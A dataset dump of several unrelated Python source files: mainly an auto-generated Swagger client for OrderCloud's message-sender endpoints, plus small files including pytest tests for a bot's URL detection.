OrderCloud/apis/message_senders_api.py
|
klreeher/python-sdk
|
b7fe922dcfc3bb73fe4149475fa45fdcb04d956a
|
[
"Apache-2.0"
] | null | null | null |
OrderCloud/apis/message_senders_api.py
|
klreeher/python-sdk
|
b7fe922dcfc3bb73fe4149475fa45fdcb04d956a
|
[
"Apache-2.0"
] | null | null | null |
OrderCloud/apis/message_senders_api.py
|
klreeher/python-sdk
|
b7fe922dcfc3bb73fe4149475fa45fdcb04d956a
|
[
"Apache-2.0"
] | null | null | null |
# coding: utf-8
"""
OrderCloud
No description provided (generated by Swagger Codegen https://github.com/swagger-api/swagger-codegen)
OpenAPI spec version: 1.0
Contact: ordercloud@four51.com
Generated by: https://github.com/swagger-api/swagger-codegen.git
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
from __future__ import absolute_import
import sys
import os
import re
# python 2 and python 3 compatibility library
from six import iteritems
from ..configuration import Configuration
from ..api_client import ApiClient
class MessageSendersApi(object):
"""
NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
Ref: https://github.com/swagger-api/swagger-codegen
"""
def __init__(self, api_client=None):
config = Configuration()
if api_client:
self.api_client = api_client
else:
if not config.api_client:
config.api_client = ApiClient()
self.api_client = config.api_client
def messagesenders_assignments_get(self, **kwargs):
"""
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.messagesenders_assignments_get(callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str buyer_id: ID of the buyer.
:param str message_sender_id: ID of the message sender.
:param str user_id: ID of the user.
:param str user_group_id: ID of the user group.
:param str level: Level of the message sender.
:param int page: Page of the message sender.
:param int page_size: Page size of the message sender.
:return: ListMessageSenderAssignment
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.messagesenders_assignments_get_with_http_info(**kwargs)
else:
(data) = self.messagesenders_assignments_get_with_http_info(**kwargs)
return data
def messagesenders_assignments_get_with_http_info(self, **kwargs):
"""
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.messagesenders_assignments_get_with_http_info(callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str buyer_id: ID of the buyer.
:param str message_sender_id: ID of the message sender.
:param str user_id: ID of the user.
:param str user_group_id: ID of the user group.
:param str level: Level of the message sender.
:param int page: Page of the message sender.
:param int page_size: Page size of the message sender.
:return: ListMessageSenderAssignment
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['buyer_id', 'message_sender_id', 'user_id', 'user_group_id', 'level', 'page', 'page_size']
all_params.append('callback')
all_params.append('_return_http_data_only')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method messagesenders_assignments_get" % key
)
params[key] = val
del params['kwargs']
resource_path = '/messagesenders/assignments'.replace('{format}', 'json')
path_params = {}
query_params = {}
if 'buyer_id' in params:
query_params['buyerID'] = params['buyer_id']
if 'message_sender_id' in params:
query_params['messageSenderID'] = params['message_sender_id']
if 'user_id' in params:
query_params['userID'] = params['user_id']
if 'user_group_id' in params:
query_params['userGroupID'] = params['user_group_id']
if 'level' in params:
query_params['level'] = params['level']
if 'page' in params:
query_params['page'] = params['page']
if 'page_size' in params:
query_params['pageSize'] = params['page_size']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json', 'text/plain; charset=utf-8'])
# Authentication setting
auth_settings = ['oauth2']
return self.api_client.call_api(resource_path, 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='ListMessageSenderAssignment',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'))
def messagesenders_assignments_post(self, assignment, **kwargs):
"""
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.messagesenders_assignments_post(assignment, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param MessageSenderAssignment assignment: (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.messagesenders_assignments_post_with_http_info(assignment, **kwargs)
else:
(data) = self.messagesenders_assignments_post_with_http_info(assignment, **kwargs)
return data
def messagesenders_assignments_post_with_http_info(self, assignment, **kwargs):
"""
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.messagesenders_assignments_post_with_http_info(assignment, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param MessageSenderAssignment assignment: (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['assignment']
all_params.append('callback')
all_params.append('_return_http_data_only')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method messagesenders_assignments_post" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'assignment' is set
if ('assignment' not in params) or (params['assignment'] is None):
raise ValueError("Missing the required parameter `assignment` when calling `messagesenders_assignments_post`")
resource_path = '/messagesenders/assignments'.replace('{format}', 'json')
path_params = {}
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'assignment' in params:
body_params = params['assignment']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json', 'text/plain; charset=utf-8'])
# Authentication setting
auth_settings = ['oauth2']
return self.api_client.call_api(resource_path, 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None,
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'))
def messagesenders_cc_listener_assignments_get(self, **kwargs):
"""
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.messagesenders_cc_listener_assignments_get(callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str search: Search of the message sender.
:param list[str] search_on: Search on of the message sender.
:param list[str] sort_by: Sort by of the message sender.
:param int page: Page of the message sender.
:param int page_size: Page size of the message sender.
:return: ListMessageCCListenerAssignment
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.messagesenders_cc_listener_assignments_get_with_http_info(**kwargs)
else:
(data) = self.messagesenders_cc_listener_assignments_get_with_http_info(**kwargs)
return data
def messagesenders_cc_listener_assignments_get_with_http_info(self, **kwargs):
"""
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.messagesenders_cc_listener_assignments_get_with_http_info(callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str search: Search of the message sender.
:param list[str] search_on: Search on of the message sender.
:param list[str] sort_by: Sort by of the message sender.
:param int page: Page of the message sender.
:param int page_size: Page size of the message sender.
:return: ListMessageCCListenerAssignment
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['search', 'search_on', 'sort_by', 'page', 'page_size']
all_params.append('callback')
all_params.append('_return_http_data_only')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method messagesenders_cc_listener_assignments_get" % key
)
params[key] = val
del params['kwargs']
resource_path = '/messagesenders/CCListenerAssignments'.replace('{format}', 'json')
path_params = {}
query_params = {}
if 'search' in params:
query_params['search'] = params['search']
if 'search_on' in params:
query_params['searchOn'] = params['search_on']
if 'sort_by' in params:
query_params['sortBy'] = params['sort_by']
if 'page' in params:
query_params['page'] = params['page']
if 'page_size' in params:
query_params['pageSize'] = params['page_size']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json', 'text/plain; charset=utf-8'])
# Authentication setting
auth_settings = ['oauth2']
return self.api_client.call_api(resource_path, 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='ListMessageCCListenerAssignment',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'))
def messagesenders_cc_listener_assignments_post(self, assignment, **kwargs):
"""
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.messagesenders_cc_listener_assignments_post(assignment, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param MessageCCListenerAssignment assignment: (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.messagesenders_cc_listener_assignments_post_with_http_info(assignment, **kwargs)
else:
(data) = self.messagesenders_cc_listener_assignments_post_with_http_info(assignment, **kwargs)
return data
def messagesenders_cc_listener_assignments_post_with_http_info(self, assignment, **kwargs):
"""
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.messagesenders_cc_listener_assignments_post_with_http_info(assignment, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param MessageCCListenerAssignment assignment: (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['assignment']
all_params.append('callback')
all_params.append('_return_http_data_only')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method messagesenders_cc_listener_assignments_post" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'assignment' is set
if ('assignment' not in params) or (params['assignment'] is None):
raise ValueError("Missing the required parameter `assignment` when calling `messagesenders_cc_listener_assignments_post`")
resource_path = '/messagesenders/CCListenerAssignments'.replace('{format}', 'json')
path_params = {}
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'assignment' in params:
body_params = params['assignment']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json', 'text/plain; charset=utf-8'])
# Authentication setting
auth_settings = ['oauth2']
return self.api_client.call_api(resource_path, 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None,
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'))
def messagesenders_get(self, **kwargs):
"""
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.messagesenders_get(callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str search: Search of the message sender.
:param list[str] search_on: Search on of the message sender.
:param list[str] sort_by: Sort by of the message sender.
:param int page: Page of the message sender.
:param int page_size: Page size of the message sender.
:return: ListMessageSender
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.messagesenders_get_with_http_info(**kwargs)
else:
(data) = self.messagesenders_get_with_http_info(**kwargs)
return data
def messagesenders_get_with_http_info(self, **kwargs):
"""
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.messagesenders_get_with_http_info(callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str search: Search of the message sender.
:param list[str] search_on: Search on of the message sender.
:param list[str] sort_by: Sort by of the message sender.
:param int page: Page of the message sender.
:param int page_size: Page size of the message sender.
:return: ListMessageSender
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['search', 'search_on', 'sort_by', 'page', 'page_size']
all_params.append('callback')
all_params.append('_return_http_data_only')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method messagesenders_get" % key
)
params[key] = val
del params['kwargs']
resource_path = '/messagesenders'.replace('{format}', 'json')
path_params = {}
query_params = {}
if 'search' in params:
query_params['search'] = params['search']
if 'search_on' in params:
query_params['searchOn'] = params['search_on']
if 'sort_by' in params:
query_params['sortBy'] = params['sort_by']
if 'page' in params:
query_params['page'] = params['page']
if 'page_size' in params:
query_params['pageSize'] = params['page_size']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json', 'text/plain; charset=utf-8'])
# Authentication setting
auth_settings = ['oauth2']
return self.api_client.call_api(resource_path, 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='ListMessageSender',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'))
def messagesenders_message_sender_id_assignments_delete(self, message_sender_id, **kwargs):
"""
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.messagesenders_message_sender_id_assignments_delete(message_sender_id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str message_sender_id: ID of the message sender. (required)
:param str buyer_id: ID of the buyer.
:param str user_id: ID of the user.
:param str user_group_id: ID of the user group.
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.messagesenders_message_sender_id_assignments_delete_with_http_info(message_sender_id, **kwargs)
else:
(data) = self.messagesenders_message_sender_id_assignments_delete_with_http_info(message_sender_id, **kwargs)
return data
def messagesenders_message_sender_id_assignments_delete_with_http_info(self, message_sender_id, **kwargs):
"""
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.messagesenders_message_sender_id_assignments_delete_with_http_info(message_sender_id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str message_sender_id: ID of the message sender. (required)
:param str buyer_id: ID of the buyer.
:param str user_id: ID of the user.
:param str user_group_id: ID of the user group.
:return: None
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['message_sender_id', 'buyer_id', 'user_id', 'user_group_id']
all_params.append('callback')
all_params.append('_return_http_data_only')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method messagesenders_message_sender_id_assignments_delete" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'message_sender_id' is set
if ('message_sender_id' not in params) or (params['message_sender_id'] is None):
raise ValueError("Missing the required parameter `message_sender_id` when calling `messagesenders_message_sender_id_assignments_delete`")
resource_path = '/messagesenders/{messageSenderID}/assignments'.replace('{format}', 'json')
path_params = {}
if 'message_sender_id' in params:
path_params['messageSenderID'] = params['message_sender_id']
query_params = {}
if 'buyer_id' in params:
query_params['buyerID'] = params['buyer_id']
if 'user_id' in params:
query_params['userID'] = params['user_id']
if 'user_group_id' in params:
query_params['userGroupID'] = params['user_group_id']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json', 'text/plain; charset=utf-8'])
# Authentication setting
auth_settings = ['oauth2']
return self.api_client.call_api(resource_path, 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None,
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'))
def messagesenders_message_sender_id_get(self, message_sender_id, **kwargs):
"""
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.messagesenders_message_sender_id_get(message_sender_id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str message_sender_id: ID of the message sender. (required)
:return: MessageSender
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.messagesenders_message_sender_id_get_with_http_info(message_sender_id, **kwargs)
else:
(data) = self.messagesenders_message_sender_id_get_with_http_info(message_sender_id, **kwargs)
return data
def messagesenders_message_sender_id_get_with_http_info(self, message_sender_id, **kwargs):
"""
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.messagesenders_message_sender_id_get_with_http_info(message_sender_id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str message_sender_id: ID of the message sender. (required)
:return: MessageSender
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['message_sender_id']
all_params.append('callback')
all_params.append('_return_http_data_only')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method messagesenders_message_sender_id_get" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'message_sender_id' is set
if ('message_sender_id' not in params) or (params['message_sender_id'] is None):
raise ValueError("Missing the required parameter `message_sender_id` when calling `messagesenders_message_sender_id_get`")
resource_path = '/messagesenders/{messageSenderID}'.replace('{format}', 'json')
path_params = {}
if 'message_sender_id' in params:
path_params['messageSenderID'] = params['message_sender_id']
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json', 'text/plain; charset=utf-8'])
# Authentication setting
auth_settings = ['oauth2']
return self.api_client.call_api(resource_path, 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='MessageSender',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'))
| 42.213095
| 150
| 0.569052
| 3,574
| 35,459
| 5.409065
| 0.062955
| 0.055814
| 0.039572
| 0.029795
| 0.937668
| 0.932702
| 0.925098
| 0.918322
| 0.916977
| 0.911184
| 0
| 0.00109
| 0.353056
| 35,459
| 839
| 151
| 42.263409
| 0.84163
| 0.329564
| 0
| 0.806202
| 1
| 0
| 0.180579
| 0.054712
| 0
| 0
| 0
| 0
| 0
| 1
| 0.03876
| false
| 0
| 0.018088
| 0
| 0.113695
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
f4f811fb80e9dddeac80bc93ebaf006eb62d6539
| 190
|
py
|
Python
|
model/components/interfaces.py
|
MattJTrueblood/Allies_RL_Prototype
|
1c7c4360156d0dc5ff53c49401d25026761862df
|
[
"Unlicense"
] | 1
|
2018-11-19T19:51:49.000Z
|
2018-11-19T19:51:49.000Z
|
model/components/interfaces.py
|
MattJTrueblood/Allies_RL_Prototype
|
1c7c4360156d0dc5ff53c49401d25026761862df
|
[
"Unlicense"
] | null | null | null |
model/components/interfaces.py
|
MattJTrueblood/Allies_RL_Prototype
|
1c7c4360156d0dc5ff53c49401d25026761862df
|
[
"Unlicense"
] | null | null | null |
from abc import ABC, abstractmethod
class Interactive(ABC):
@abstractmethod
def interact(self, actor): pass
class UpdateOnTick(ABC):
@abstractmethod
def update(self): pass
| 19
| 35
| 0.726316
| 22
| 190
| 6.272727
| 0.590909
| 0.369565
| 0.289855
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.189474
| 190
| 9
| 36
| 21.111111
| 0.896104
| 0
| 0
| 0.285714
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.285714
| false
| 0.285714
| 0.142857
| 0
| 0.714286
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 1
| 0
|
0
| 7
|
7612c684597556f8d8d859539a8e20438160f613
| 2,284
|
py
|
Python
|
tests/test_urls.py
|
kraptor/perlink
|
bffaf9ed5bac1bbb258403b5c4b4d3f936df56f3
|
[
"MIT"
] | 2
|
2021-05-10T06:16:09.000Z
|
2021-09-07T15:24:47.000Z
|
tests/test_urls.py
|
kraptor/perlink
|
bffaf9ed5bac1bbb258403b5c4b4d3f936df56f3
|
[
"MIT"
] | null | null | null |
tests/test_urls.py
|
kraptor/perlink
|
bffaf9ed5bac1bbb258403b5c4b4d3f936df56f3
|
[
"MIT"
] | null | null | null |
# Copyright (c) 2021 kraptor
#
# This software is released under the MIT License.
# https://opensource.org/licenses/MIT
import os
import perlink.config
import perlink.bot
def test_allow_raw_uris():
config = perlink.config.load()
config.detect_raw_links = True
bot = perlink.bot.PerlinkBot(config)
MESSAGES = [
("itch.io", ["itch.io"]),
("itch.io youtube.com", ["itch.io", "youtube.com"]),
("http://itch.io", ["http://itch.io"]),
("", []),
(None, []),
]
for msg, expected in MESSAGES:
urls = list(bot.find_urls(msg))
assert urls == expected
def test_only_non_raw_uris():
config = perlink.config.load()
config.detect_raw_links = False
bot = perlink.bot.PerlinkBot(config)
MESSAGES = [
("itch.io", []),
("itch.io http://youtube.com", ["http://youtube.com"]),
("", []),
(None, []),
]
for msg, expected in MESSAGES:
urls = list(bot.find_urls(msg))
assert urls == expected
def test_ignore_links_with_secrets():
config = perlink.config.load()
config.detect_raw_links = True
config.ignore_links_with_secrets = True
config.valid_link_protocols.add("http")
bot = perlink.bot.PerlinkBot(config)
MESSAGES = [
("a:a@itch.io", []),
("http://theuser:thepassword@example.com", []),
("http://:thepassword@example.com", []),
("http://theuser:@example.com", []),
("", []),
(None, []),
]
for msg, expected in MESSAGES:
urls = list(bot.find_urls(msg))
assert urls == expected
def test_keep_links_with_secrets():
config = perlink.config.load()
config.detect_raw_links = True
config.ignore_links_with_secrets = False
config.valid_link_protocols.add("http")
bot = perlink.bot.PerlinkBot(config)
MESSAGES = [
("http://theuser:thepassword@example.com", ["http://theuser:thepassword@example.com"]),
("http://:thepassword@example.com", ["http://:thepassword@example.com"]),
("http://theuser:@example.com", ["http://theuser:@example.com"]),
("", []),
(None, []),
]
for msg, expected in MESSAGES:
urls = list(bot.find_urls(msg))
assert urls == expected
| 26.55814
| 95
| 0.590193
| 263
| 2,284
| 4.984791
| 0.231939
| 0.04119
| 0.074752
| 0.114416
| 0.800915
| 0.800915
| 0.776506
| 0.776506
| 0.776506
| 0.773455
| 0
| 0.002298
| 0.237741
| 2,284
| 85
| 96
| 26.870588
| 0.750718
| 0.049037
| 0
| 0.587302
| 0
| 0
| 0.201754
| 0
| 0
| 0
| 0
| 0
| 0.063492
| 1
| 0.063492
| false
| 0.063492
| 0.047619
| 0
| 0.111111
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 7
|
520722ca5520021bb24fcfbe1ca90b58346d1337
| 174
|
py
|
Python
|
integration/tests/error_predicate.py
|
markus1189/hurl-dev
|
2f5bdf3519bda3155a6acc01cb442a3cb4364584
|
[
"Apache-2.0"
] | 4
|
2020-08-26T12:22:58.000Z
|
2020-09-06T22:29:18.000Z
|
integration/tests/error_predicate.py
|
markus1189/hurl-dev
|
2f5bdf3519bda3155a6acc01cb442a3cb4364584
|
[
"Apache-2.0"
] | 11
|
2021-01-07T12:22:38.000Z
|
2022-03-22T22:31:20.000Z
|
integration/tests/error_predicate.py
|
markus1189/hurl-dev
|
2f5bdf3519bda3155a6acc01cb442a3cb4364584
|
[
"Apache-2.0"
] | 10
|
2020-09-02T09:43:16.000Z
|
2022-02-11T07:50:24.000Z
|
from tests import app
@app.route("/predicate/error/type")
def predicate_error_type():
return '{ "status": true, "message": "0", "count": 1, "empty": "", "number": 1.0 }'
| 34.8
| 87
| 0.632184
| 24
| 174
| 4.5
| 0.75
| 0.259259
| 0.333333
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.026667
| 0.137931
| 174
| 5
| 87
| 34.8
| 0.693333
| 0
| 0
| 0
| 0
| 0.25
| 0.542857
| 0.12
| 0
| 0
| 0
| 0
| 0
| 1
| 0.25
| true
| 0
| 0.25
| 0.25
| 0.75
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 1
| 1
| 0
|
0
| 9
|
52087542fc97d4e7b380f91bd3bd306218d08520
| 152
|
py
|
Python
|
dis_snek/utils/__init__.py
|
KAJdev/Dis-Snek
|
f2bbdd2b8ae2b4ccd7351d0ed01e1c77573669c2
|
[
"MIT"
] | 34
|
2021-08-03T13:58:14.000Z
|
2021-10-04T11:09:44.000Z
|
dis_snek/utils/__init__.py
|
KAJdev/Dis-Snek
|
f2bbdd2b8ae2b4ccd7351d0ed01e1c77573669c2
|
[
"MIT"
] | 6
|
2021-08-05T12:58:33.000Z
|
2021-10-04T01:18:07.000Z
|
dis_snek/utils/__init__.py
|
KAJdev/Dis-Snek
|
f2bbdd2b8ae2b4ccd7351d0ed01e1c77573669c2
|
[
"MIT"
] | 9
|
2021-07-30T14:10:45.000Z
|
2021-10-03T17:36:26.000Z
|
from .attr_utils import *
from .cache import *
from .converters import *
from .input_utils import *
from .misc_utils import *
from .serializer import *
| 21.714286
| 26
| 0.763158
| 21
| 152
| 5.380952
| 0.428571
| 0.442478
| 0.39823
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.157895
| 152
| 6
| 27
| 25.333333
| 0.882813
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
523a26d2b50c9c3ea26de8f08930482640fe3a4e
| 149
|
py
|
Python
|
stweet/export_data/__init__.py
|
iJohnMaged/stweet
|
00f4a12b1da1be514266b74a7ca70a669f0c8ae4
|
[
"MIT"
] | 1
|
2021-04-15T17:45:39.000Z
|
2021-04-15T17:45:39.000Z
|
stweet/export_data/__init__.py
|
chillerno1/stweet
|
ff7224a7b69b711b17247db40f859e620747e20b
|
[
"MIT"
] | null | null | null |
stweet/export_data/__init__.py
|
chillerno1/stweet
|
ff7224a7b69b711b17247db40f859e620747e20b
|
[
"MIT"
] | 1
|
2022-01-05T11:20:31.000Z
|
2022-01-05T11:20:31.000Z
|
from .tweet_export import export_tweets_to_csv, export_tweets_to_json_lines
from .user_export import export_users_to_csv, export_users_to_json_lines
| 49.666667
| 75
| 0.90604
| 26
| 149
| 4.576923
| 0.423077
| 0.201681
| 0.302521
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.067114
| 149
| 2
| 76
| 74.5
| 0.856115
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
